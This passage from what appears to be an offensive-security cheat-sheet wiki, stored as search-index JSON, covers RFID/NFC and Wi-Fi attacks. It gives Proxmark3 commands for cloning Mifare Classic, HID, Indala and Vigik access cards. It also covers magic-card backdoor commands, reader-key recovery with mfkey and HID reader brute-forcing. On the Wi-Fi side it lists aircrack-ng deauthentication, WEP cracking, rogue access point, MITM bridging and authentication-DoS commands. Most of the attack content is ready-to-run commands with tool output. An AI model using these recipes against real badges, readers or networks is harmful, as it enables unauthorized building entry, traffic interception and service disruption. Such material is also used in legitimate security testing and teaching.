"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-2","title":"Magic Chinese Card - GEN 2","text":"

They can be copied directly. The software allows a new UID.

"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-1a","title":"Magic Chinese Card - GEN 1a","text":"

Works better on the official client.py than on the iceman fork.

Reset a UID-changeable magic card (7-byte UID). You should prefer this method!

proxmark3> hf mf csetuid 42917CAB 0004 08\nuid:42 91 7c ab           \n--atqa:00 04  sak:08          \nChinese magic backdoor commands (GEN 1a) detected  \n

To set the whole block 0 at once: hf mf csetblk 0 42917CAB00080400022A2C87933EF21D

NOTE: On several cards the UID can be computed from the printed decimal ID, e.g. ID 2910621770:

import struct\n# pack the printed decimal ID as a little-endian 32-bit integer; the bytes are the UID\nstruct.pack('<I', 2910621770).hex()  # Python 3; on Python 2 use .encode('hex') instead of .hex()\n'4a907cad'\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#unbricking-chinese-magic-mifare-classic","title":"Unbricking Chinese Magic Mifare Classic","text":"

If you set a wrong BCC for the UID and can no longer read the card, you can use the backdoor commands to rewrite sector 0 with the Proxmark:

hf 14a raw -a -p -b 7 40\nhf 14a raw -p 43\nhf 14a raw -p -c a0 00\nhf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#write-and-read-sectors","title":"Write and read sectors","text":"

Avoid writing block 3 (the sector trailer, which contains keys A/B and the access bits).

proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f   \nproxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037\n
hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dump-mifare-card","title":"Dump Mifare card","text":"
proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin\n\n<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K\nk <name>     : key filename, if no <name> given, UID will be used as filename\nf <name>     : data filename, if no <name> given, UID will be used as filename\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#simulate-and-emulate-mifare-card","title":"Simulate and emulate Mifare card","text":"

Emulate from a dump file

# convert .bin to .eml\nproxmark3> script run dumptoemul -i dumpdata.bin\nproxmark3> hf mf eload <file name w/o .eml>\n

Simulate Mifare 1K UID

proxmark3> hf mf sim u 353c2aa6\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#mitm-attack","title":"MITM attack","text":"
hf 14a snoop\n# read card\n# push button\n\nhf list 14a\n089220 |   095108 | Tag | 4d  xx  xx  xx  d3                                              |     | UID\n114608 |   125072 | Rdr | 93  70  4d  xx  xx  xx  d3  4f  8d                              |  ok | SELECT_UID\n...\n525076 |   529748 | Tag | 61  7a  66  18                                                  |     | TAG CHALLENGE\n540608 |   549920 | Rdr |50! 87!  8e  ab 3b!  49  5a  1b                                  | !crc| HALT\n551188 |   555860 | Tag |d6! 53!  7c 57!                                                  |     | TAG RESPONSE\nUID: 4dxxxxxxd3\nTAG CHALLENGE: 617a6618\nREADER CHALLENGE: 50878eab\nREADER RESPONSE: 3b495a1b\nTAG RESPONSE: d6537c57\n\n# crapto1gui or mfkey\ncd tools/mfkey\nmake\n./mfkey64\n./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#reader-only-attack","title":"Reader only attack","text":"

Emulate a MIFARE Classic with a DEADBEEF UID.

proxmark3> hf mf sim u deadbeef n 1 x\nmf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)\n#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:\n#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx\n#db# Emulator stopped. Tracing: 1 trace length: 253\n#db# 4B UID: deadbeef\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#read-a-mifare-dump","title":"Read a Mifare Dump","text":"
pip install bitstring\ngit clone https://github.com/zhovner/mfdread\nmfdread.py ./dump.mfd\n
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-4k","title":"HF - Mifare Classic 4k","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#chinese-magic-mifare-classic-4k","title":"Chinese Magic Mifare Classic 4K","text":"

Block 0 is writable through normal Mifare Classic commands, i.e. there is no special \"unlocked\" read/write mode like in the \"magic Mifare 1k\" version.

Writing block 0 with Proxmark, UID 01020304, using key A being FFFFFFFFFFFF:

hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000\n

Again, make sure the BCC is correct and avoid the Cascade Tag (0x88) as the first byte of the UID, or you may make the card unselectable (i.e. brick it).

"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-mifare-desfire/","title":"HF - Mifare DESFire","text":""},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#desfire-format","title":"DESFire\u00ae Format","text":"

Each card has a master application with AID 0x000000 that saves the card's configuration. The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.

"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#applications","title":"Applications","text":"
hf mfdes lsapp --no-auth # show applications list without authentication\nhf mfdes lsapp # show applications list with authentication from default settings\nhf mfdes lsapp --files # show applications list with their files\nhf mfdes getaids --no-auth # this command can return a simple AID list if it is enabled in the card settings\n

Each application has an individual set of up to 14 application keys (can be AES-128 or DES keys)

"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#files","title":"Files","text":"

Each file has its own communication mode.

Dump files

hf mfdes lsfiles --aid 123456 -t aes # file list for application 123456 with aes key\nhf mfdes dump --aid 123456 # shows files and their contents from application 123456\n

Read/Write files

Read

hf mfdes read --aid 123456 --fid 01 # autodetect file type (with hf mfdes getfilesettings) and read its contents\nhf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 # read one last record from a record file\n

Read via ISO command set

hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso # select application via native command and then read file via ISO\nhf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso # select all via ISO commands and then read\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 # read one record (number 5) from file ID 1100 via ISO command set\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 # read all the records (from 5 to 1) from file ID 1100 via ISO command set\n

Write

hf mfdes write --aid 123456 --fid 01 -d 01020304 # autodetect file type (with hf mfdes getfilesettings) and write data with offset 0\nhf mfdes write --aid 123456 --fid 01 --type data -d 01020304 --commit # write backup data file and commit\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 # increment value file\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 --debit # decrement value file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 # write data to a record file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 # update record 0 (latest) in the record file.\n

Write via iso command set

hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 # write data to std/backup file via ISO command set\nhf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 # send record to record file via ISO command set\n
"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#default-keys","title":"Default Keys","text":"

Changing the default keys is a crucial step in the deployment of MIFARE DESFire cards to prevent unauthorized cloning and access.

Use a key to get UID

hf mfdes getuid # authenticate with default key\nhf mfdes getuid -s d40 # via d40 secure channel\nhf mfdes getuid -s ev2 -t aes -k 11223344556677889900112233445566 # via ev2 secure channel with specified aes key\n
hf mfdes detect # simply detect key for master application (PICC level)\nhf mfdes detect --save # detect key and save to defaults. look after to output of hf mfdes default\nhf mfdes detect -s d40 # detect via channel d40\nhf mfdes detect --dict mfdes_default_keys # detect key with help of dictionary file\nhf mfdes detect --aid 123456 -n 2 # detect key 2 from application with AID 123456\n
hf mfdes auth -n 0 -t des -k 1122334455667788 --aid 123456 # try application 123456 master key\nhf mfdes auth -n 0 -t aes --save # try PICC AES master key and save the configuration to defaults if authentication succeeds\n
"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#uid-check","title":"UID check","text":"

The UID of the modifiable MIFARE DESFire\u00ae Compatible UID tags consists of two parts: the UID itself and the BCC. The BCC is a checksum value calculated from the UID. If the BCC is incorrect, the tag will be rejected by the reader.

hf 14a raw -s -c 02 00 ab 00 00 00 07 xx xx xx xx xx xx xx xx xx\n

For MIFARE DESFire cards, Flipper Zero is able to emulate only the UID.

UID rewritable cards: LAB 401 - MODIFIABLE MIFARE DESFIRE\u00ae COMPATIBLE UID; LAB 401 - MIFARE DESFIRE\u00ae COMPATIBLE MODIFIABLE UID / ATQA / SAK / ATS / APDU

"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/","title":"HF - Mifare UltraLight","text":""},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#chinese-backdoor","title":"Chinese backdoor","text":"
pm3 --> hf 14a raw -p -b 7 40\npm3 --> hf 14a raw -p 43\npm3 --> hf 14a raw -p -c a20059982120\n\n0x40, init backdoor mode\n0x41, wipe fills card with 0xFF\n0x42, fills card with 0x00\n0x43, no authentication needed.  issue a 0x3000 to read block 0, or write block.\n0x44, fills card with 0x55\n
"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#simulate","title":"Simulate","text":"
hf 14a sim 2 <7-byte tag>\n
"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-vigik/","title":"HF - Vigik","text":"

Vigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards.

modprobe -r pn533_usb\nmodprobe -r pn533\n\nnfc-list # Check the proper functioning of the reader\nmfoc -P 500 -O blank-card.dmp # Extract the encryption keys from the Chinese RFID chip into a file\nmfoc -P 500 -O original-card.dmp # Copy the content of the original RFID chip into a file\nnfc-mfclassic W a original-card.dmp blank-card.dmp # Write the content of the original chip onto the Chinese chip\n
"},{"location":"protocols/rfid-nfc/hf-vigik/#residential-service-tokens","title":"Residential & Service Tokens","text":"

Usually the key A is 0x314b49474956 (\"1KIGIV\")

Provider | Service Code | Days | Hours\nLa Poste Service Universel | 0x7aa | Mo-Sa | 6:00-0:00\nLa Poste Autres Services | 0x7ab | Any day | 6:00-0:00\nFrance Telecom | 0x7ac | Any day | Any time\nEDF-GDF | 0x7ad | Any day | Any time"},{"location":"protocols/rfid-nfc/hf-vigik/#public-keys","title":"Public Keys","text":"
\"La Poste Service Universel\", 0x07AA, \"AB9953CBFCCD9375B6C028ADBAB7584BED15B9CA037FADED9765996F9EA1AB983F3041C90DA3A198804FF90D5D872A96A4988F91F2243B821E01C5021E3ED4E1BA83B7CFECAB0E766D8563164DE0B2412AE4E6EA63804DF5C19C7AA78DC14F608294D732D7C8C67A88C6F84C0F2E3FAFAE34084349E11AB5953AC68729D07715\"\n\"La Poste Service Universel\", 0x07AA, \"1577D02987C63A95B51AE149430834AEAF3F2E0F4CF8C6887AC6C8D732D79482604FC18DA77A9CC1F54D8063EAE6E42A41B2E04D1663856D760EABECCFB783BAE1D43E1E02C5011E823B24F2918F98A4962A875D0DF94F8098A1A30DC941303F98ABA19E6F996597EDAD7F03CAB915ED4B58B7BAAD28C0B67593CDFCCB5399AB\"\n\"La Poste Autres Services\", 0x07AB, \"A6D99B8D902893B04F3F8DE56CB6BF24338FEE897C1BCE6DFD4EBD05B7B1A07FD2EB564BB4F7D35DBFE0A42966C2C137AD156E3DAB62904592BCA20C0BC7B8B1E261EF82D53F52D203843566305A49A22062DECC38C2FE3864CAD08E79219487651E2F79F1C9392B48CAFE1BFFAFF4802AE451E7A283E55A4026AD1E82DF1A15\"\n\"La Poste Autres Services\", 0x07AB, \"151adf821ead26405ae583a2e751e42a80f4afff1bfeca482b39c9f1792f1e65879421798ed0ca6438fec238ccde6220a2495a3066358403d2523fd582ef61e2b1b8c70b0ca2bc92459062ab3d6e15ad37c1c26629a4e0bf5dd3f7b44b56ebd27fa0b1b705bd4efd6dce1b7c89ee8f3324bfb66ce58d3f4fb09328908d9bd9a6\"\n\"France Telecom\", 0x07AC, \"C44DBCD92F9DCF42F4902A87335DBB35D2FF530CDB09814CFA1F4B95A1BD018D099BC6AB69F667B4922AE1ED826E72951AA3E0EAAA7D49A695F04F8CDAAE2D18D10D25BD529CBB05ABF070DC7C041EC35C2BA7F58CC4C349983CC6E11A5CBE828FB8ECBC26F08E1094A6B44C8953C8E1BAFD214DF3E69F430A98CCC75C03669D\"\n\"France Telecom\", 0x07AC, \"9d66035cc7cc980a439fe6f34d21fdbae1c853894cb4a694108ef026bcecb88f82be5c1ae1c63c9849c3c48cf5a72b5cc31e047cdc70f0ab05bb9c52bd250dd1182daeda8c4ff095a6497daaeae0a31a95726e82ede12a92b467f669abc69b098d01bda1954b1ffa4c8109db0c53ffd235bb5d33872a90f442cf9d2fd9bc4dc4\"\n\"EDF-GDF\", 0x07AD, 
\"B35193DBD2F88A21CDCFFF4BF84F7FC036A991A363DCB3E802407A5E5879DC2127EECFC520779E79E911394882482C87D09A88B0711CBC2973B77FFDAE40EA0001F595072708C558B484AB89D02BCBCB971FF1B80371C0BE30CB13661078078BB68EBCCA524B9DD55EBF7D47D9355AFC95511350CC1103A5DEE847868848B235\"\n\"EDF-GDF\", 0x07AD, \"35b248888647e8dea50311cc50135195fc5a35d9477dbf5ed59d4b52cabc8eb68b0778106613cb30bec07103b8f11f97cbcb2bd089ab84b458c508270795f50100ea40aefd7fb77329bc1c71b0889ad0872c4882483911e9799e7720c5cfee2721dc79585e7a4002e8b3dc63a391a936c07f4ff84bffcfcd218af8d2db9351b3\"\n
"},{"location":"protocols/rfid-nfc/hf-vigik/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/","title":"LF - HID & Indala","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-indala","title":"HID & Indala","text":"

Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.

lf search               # HID Prox TAG ID: 2004263f88\nlf hid fskdemod         # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid demod            # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid clone 2004263f88 # (ID to clone)\nlf hid sim 200671012d   # simulate HID card with UID=200671012d\n\nlf indala read\nlf indala demod\nlf indala sim a0000000c2c436c1   # simulate Indala with UID=a0000000c2c436c1\nlf indala clone a0000000c2c436c1 # clone Indala to T55x7 card\n\nlf hitag info\nlf hitag sim c378181c_a8f7.ht2   # simulate HiTag\n
"},{"location":"protocols/rfid-nfc/lf-hid-indala/#lf-em410x","title":"LF - EM410X","text":"

Read only memory :/

Proxmark> lf em4x em410xread\nEM410x Tag ID: 23004d4dee\nProxmark> lf em4x em410xsim 23004d4dee\n
"},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-examples-card","title":"HID : Examples - Card","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-card-format","title":"HID card format","text":"
proxmark3> lf hid decode 10001fc656\n--------------------------------------------------          \n       Format: H10302 (HID H10302 37-bit huge ID)          \n  Card Number: 1041195          \n       Parity: Valid          \n--------------------------------------------------          \n       Format: H10304 (HID H10304 37-bit)          \nFacility Code: 1          \n  Card Number: 516907          \n       Parity: Valid          \n-------------------------------------------------- \n
"},{"location":"protocols/rfid-nfc/lf-hid-indala/#write-to-an-hid-card","title":"Write to an HID card","text":"
# version with facility code is better\nproxmark3> lf hid encode H10304 f 49153 c 516907\nHID Prox TAG ID: 1c001fc656         \n\nproxmark3> lf hid encode H10302 c 1041195\nHID Prox TAG ID: 10001fc656          \n-------------------------------------------------\n

Example 2

proxmark3> lf hid decode 1c0006bb43\n--------------------------------------------------          \n       Format: H10302 (HID H10302 37-bit huge ID)          \n  Card Number: 220577          \n       Parity: Valid          \n--------------------------------------------------          \n       Format: H10304 (HID H10304 37-bit)          \nFacility Code: 49152          \n  Card Number: 220577          \n       Parity: Valid          \n--------------------------------------------------          \nproxmark3> lf hid encode H10302 c 220577\nHID Prox TAG ID: 100006bb43  \n
"},{"location":"protocols/rfid-nfc/lf-hid-indala/#bruteforce-an-hid-reader","title":"Bruteforce an HID reader","text":"
pm3 --> lf hid brute a 26 f 224\npm3 --> lf hid brute v a 26 f 21 c 200 d 2000\n\nOptions\n---\na <format>        :  26|33|34|35|37|40|44|84\nf <facility-code> :  8-bit value HID facility code\nc <cardnumber>    :  (optional) cardnumber to start with, max 65535\nd <delay>         :  delay betweens attempts in ms. Default 1000ms\nv                 :  verbose logging, show all tries\n
"},{"location":"protocols/rfid-nfc/lf-hid-indala/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/readme/","title":"NFC - RFID","text":"

Radio Frequency Identification (RFID) & Near Field Communication (NFC)

"},{"location":"protocols/rfid-nfc/readme/#notes-about-card-types","title":"Notes about card types","text":""},{"location":"protocols/rfid-nfc/readme/#high-frequency","title":"High Frequency","text":"

Around 13.56 MHz.

"},{"location":"protocols/rfid-nfc/readme/#low-frequency","title":"Low Frequency","text":"

Usually around 125 kHz.

"},{"location":"protocols/rfid-nfc/readme/#replay-attacks","title":"Replay Attacks","text":"

A replay attack is a technique in which a malicious user builds a device to intercept an NFC transaction and redeem it later, from another device or even from a different location.

"},{"location":"protocols/rfid-nfc/readme/#relay-attack","title":"Relay Attack","text":"

A relay attack is a technique in which a malicious user mounts a man-in-the-middle attack. The attacker (APDUer) is able to intercept, manipulate and change the transaction in real time to take advantage of it. https://en.wikipedia.org/wiki/Relay_attack

"},{"location":"protocols/rfid-nfc/readme/#references","title":"References","text":""},{"location":"protocols/wifi/wifi-basics/","title":"Wifi - Basics","text":""},{"location":"protocols/wifi/wifi-basics/#tools","title":"Tools","text":""},{"location":"protocols/wifi/wifi-basics/#linux-wireless-basics","title":"Linux Wireless Basics","text":"
AP_MAC=\"XX:XX:XX:XX:XX:XX\"       # BSSID\nVICTIM_MAC=\"XX:XX:XX:XX:XX:XX\"   # VIC\nATTACKER_MAC=\"XX:XX:XX:XX:XX:XX\" # MON\nAP_SSID=\"wifibox\"                # ESSID\nSRC_ADDR=\"192.168.1.1\"\nDST_ADDR=\"192.168.1.255\"\n
# driver install\napt install realtek-rtl88xxau-dkms\n\n# network card recon\niwconfig\niw list\ndmesg | grep 8187 # alfa card\n\n# Increase Wi-Fi TX Power\niw reg set B0\niwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)\n\n# find SSID and channel\niw dev wlan0 scan | grep SSID\niw dev wlan0 scan | egrep \"DS\\ Parameter\\ set|SSID\"\niwlist wlan0 scanning | egrep \"ESSID|Channel\"\n\n# monitor mode - start\nairmon-ng start wlan0\nairmon-ng start wlan0 3 # only on a particular channel e.g: 3\n    * Manual 1: iw dev wlan0 interface add mon0 type monitor\n    * Manual 2: iwconfig wlan0 mode monitor channel 3\nifconfig mon0 up\n# monitor mode - stop\nairmon-ng stop mon0\n    * Manual 1: iw dev wlan0 interface del mon0 \n    * Manual 2: iwconfig wlan0 mode managed\n
"},{"location":"protocols/wifi/wifi-basics/#aircrack-ng-essentials","title":"Aircrack-ng Essentials","text":"
# check and kill processes that could interfere with our monitor mode\nairmon-ng check\nairmon-ng check kill\n# pkill dhclient; pkill wpa_supplicant; pkill dhclient3\n\n# list AP\nairodump-ng mon0\nairodump-ng mon0 -c 3 # only on a particular channel e.g: 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic\n\n# get our macaddress\nmacchanger -s mon0 \nmacchanger --show mon0\n\n# replay and accelerate traffic\naireplay-ng\n    * -i interface\n    * -r file.pcap\n\n# check aireplay card compatibility\naireplay-ng -9 mon0 -> test injection\naireplay-ng -9 -i wlan1 mon0 -> test card to card injection\n\n# injection rate\niwconfig wlan0 rate 1M\n\n# Aircrack compatibility\nhttp://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters\nAlfa AWUS036H / TPLink WN722\n
"},{"location":"protocols/wifi/wifi-basics/#fake-authentication-attack","title":"Fake authentication attack","text":"

Use it before each attack.

airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0\n\n# fake authentication = no arp\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n    * Might need a real $ATTACKER_MAC, observe traffic using airodump\n    > Association successful! :-)\n\n# fake authentication for picky AP\n# Send keep-alive packets every 10 seconds\naireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>\n\n# might need to fake your MAC ADDRESS first\n
"},{"location":"protocols/wifi/wifi-basics/#deauthentication-attack","title":"Deauthentication attack","text":"

Force an ARP packet to be sent.

aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n    * -0 : 1 deauthentication, 0 unlimited\n    > Sending 64 directed DeAuth.\n
"},{"location":"protocols/wifi/wifi-basics/#arp-replay-attack","title":"ARP Replay Attack","text":"

Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.

aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n    * ATTACKER_MAC if fake authentication launched\n    * CONNECTED_MAC if a client is associated\n\n# -x 1000 -n 1000 ?\n# aireplay-ng -3 -x 1000 -n 1000 -b $AP_MAC -h $ATTACKER_MAC wlan0mon\n# wait for ARP on the network\n# alternatively you can de-auth some clients\n\naircrack-ng -b <BSSID> <PCAP_of_FileName>\naircrack-ng -0 wep1.cap\n    * -0 : colored output\n
"},{"location":"protocols/wifi/wifi-basics/#references","title":"References","text":""},{"location":"protocols/wifi/wifi-corporate/","title":"Wifi - Enterprise Network","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-and-wpa2-eap","title":"WPA and WPA2 EAP","text":"

WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).

"},{"location":"protocols/wifi/wifi-corporate/#rogue-access-point","title":"Rogue Access Point","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-handshake","title":"WPA handshake","text":"
airmon-ng start wlan0 3\nairodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0\n\n# basic fake AP\nairbase-ng -c 3 -e $AP_SSID mon0\nairbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0\n-W 1 : WEP\n\n# get a WPA handshake if the client connect\naircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap\n
"},{"location":"protocols/wifi/wifi-corporate/#karmetasploit","title":"Karmetasploit","text":"
# install a dhcp server\napt install dhcp3-server\n\nairmon-ng start wlan0 3\nairbase-ng -c 3 -P -C 60 -e $AP_SSID -v mon0\n-P: respond to all probes\nifconfig at0 up 10.0.0.1/24\n\nmkdir -p /var/run/dhcpd\nchown -R dhcpd:dhcpd /var/run/dhcpd\ntouch /var/lib/dhcp3/dhcpd.leases\n\n\"CONF DHCP FROM VIDEO 75\" > /tmp/dhcpd.conf\n\ntouch /tmp/dhcp.log\nchown -R dhcpd:dhcpd /tmp/dhcp.log\ndhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp.log at0\n\nkarma.rc from metasploit\n# comment the first 2 lines (load sqlite)\nmsfconsole -r /root/karma.rc\n
"},{"location":"protocols/wifi/wifi-corporate/#access-point-mitm","title":"Access Point MITM","text":"
airmon-ng start wlan0 3\nairbase-ng -c 3 -e $AP_SSID_SPOOFED mon0\n\n# create a bridged interface\n# apt-get install bridge-utils\nbrctl addbr hacker\nbrctl addif hacker eth0\nbrctl addif hacker at0\n\n# assign IP addresses\nifconfig eth0 0.0.0.0 up\nifconfig at0 0.0.0.0 up\nifconfig hacker 192.168.1.8 up\n\n# enable IP forwarding\necho 1 > /proc/sys/net/ipv4/ip_forward\n\n# mitm tools\ndriftnet\nettercap -G\nSniff > Unified sniffing > Hacker Interface\n
"},{"location":"protocols/wifi/wifi-corporate/#references","title":"References","text":""},{"location":"protocols/wifi/wifi-other/","title":"Wifi - Additional Tricks and Tools","text":""},{"location":"protocols/wifi/wifi-other/#additional-aircrack-ng-tools","title":"Additional Aircrack-NG Tools","text":""},{"location":"protocols/wifi/wifi-other/#remove-wireless-headers","title":"Remove Wireless Headers","text":"
airdecap-ng -b $AP_MAC open-network.cap\n* -dec.cap: stripped version of the file\n
"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wep-encrypted-capture-file","title":"Decrypt a WEP encrypted capture file","text":"
airdecap-ng -w $WEP_KEY wep.cap\n
"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wpa2-encrypted-capture-file","title":"Decrypt a WPA2 encrypted capture file","text":"
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap\n
"},{"location":"protocols/wifi/wifi-other/#remote-aircrack-suite","title":"Remote Aircrack Suite","text":"
airmon-ng start wlan0 3\nairserv-ng -p 1337 -c 3 -d mon0\nairodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT\n
"},{"location":"protocols/wifi/wifi-other/#wireless-intrusion-detection-system","title":"Wireless Intrusion Detection System","text":"

Requires the wireless key and BSSID

airmon-ng start wlan0 3\n\n# create the at0 interface\nairtun-ng -a $AP_MAC -w $WEP_KEY mon0\n# the interface will auto decrypt packets\n
"},{"location":"protocols/wifi/wifi-other/#wireless-reconnaissance","title":"Wireless Reconnaissance","text":"

Use CSV file from airodump

CAPR Graph

airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png\n# color\n- green: wpa\n- yellow: wep\n- red: open\n- black: unknown\n

CPG - Client Probe Graph

airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png\n
"},{"location":"protocols/wifi/wifi-other/#kismet","title":"Kismet","text":"
kismet\n[enter][enter]\n[tab][close]\n\n# Select a source and begin a monitoring\nKismet > Add source > wlan0 > Add\n\n.nettxt: data\n.pcapdump: wireshark format\n
# giskismet: kismet inside a SQL database\n> require a GPS receiver\n\ngpsd -n -N -D4 /dev/ttyUSB0\n-N : foreground \n-D : debugging level\n\n# kismet will gather SSID and GPS location\ngiskismet -x kismet.netxml\n\n# generate a kml file (Google Earth)\ngiskismet -q \"select * from wireless\" -o allaps.kml\ngiskismet -q \"select * from wireless where Encryption='WEP'\" -o wepaps.kml\n
"},{"location":"protocols/wifi/wifi-other/#other-things","title":"Other things","text":"
# Find Hidden SSID\naireplay-ng -0 20 -a <BSSID> -c <VictimMac> mon0\n\n# Mac Filtering\nmacchanger --mac <VictimMac> wlan0mon\naireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon\n# MAC CHANGER\nifconfig wlan0mon down\nmacchanger --mac <macVictima> wlan0mon\nifconfig wlan0mon up\n\n# Deauth Global\naireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon\n\n# Authentication DoS Mode\nmdk3 wlan0mon a -a $AP_MAC\n\n# Tshark - Filter and display data\ntshark -r Captura-02.cap -Y \"eapol\" 2>/dev/null\ntshark -i wlan0mon -Y \"wlan.fc.type_subtype==4\" 2>/dev/null\ntshark -r Captura-02.cap -Y \"(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53\" 2>/dev/null\n\n# Convert .cap with handshake to .hccap\naircrack-ng -J network network.cap\n
"},{"location":"protocols/wifi/wifi-wep/","title":"Wifi - WEP Cracking","text":""},{"location":"protocols/wifi/wifi-wep/#cracking-wep-with-a-client","title":"Cracking WEP with a Client","text":""},{"location":"protocols/wifi/wifi-wep/#arp-request-replay-attack","title":"ARP Request Replay Attack","text":"

Attack the ACCESS POINT

airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic\n\n# Fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# Deauthentication\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# Cracking\naircrack-ng arpreplay.cap\n
"},{"location":"protocols/wifi/wifi-wep/#interactive-replay-attack","title":"Interactive replay attack","text":"

Attack a client to force new packets. The 0841 attack, or interactive packet replay, is a WEP attack that allows packet injection when ARP replay is not available or not working.

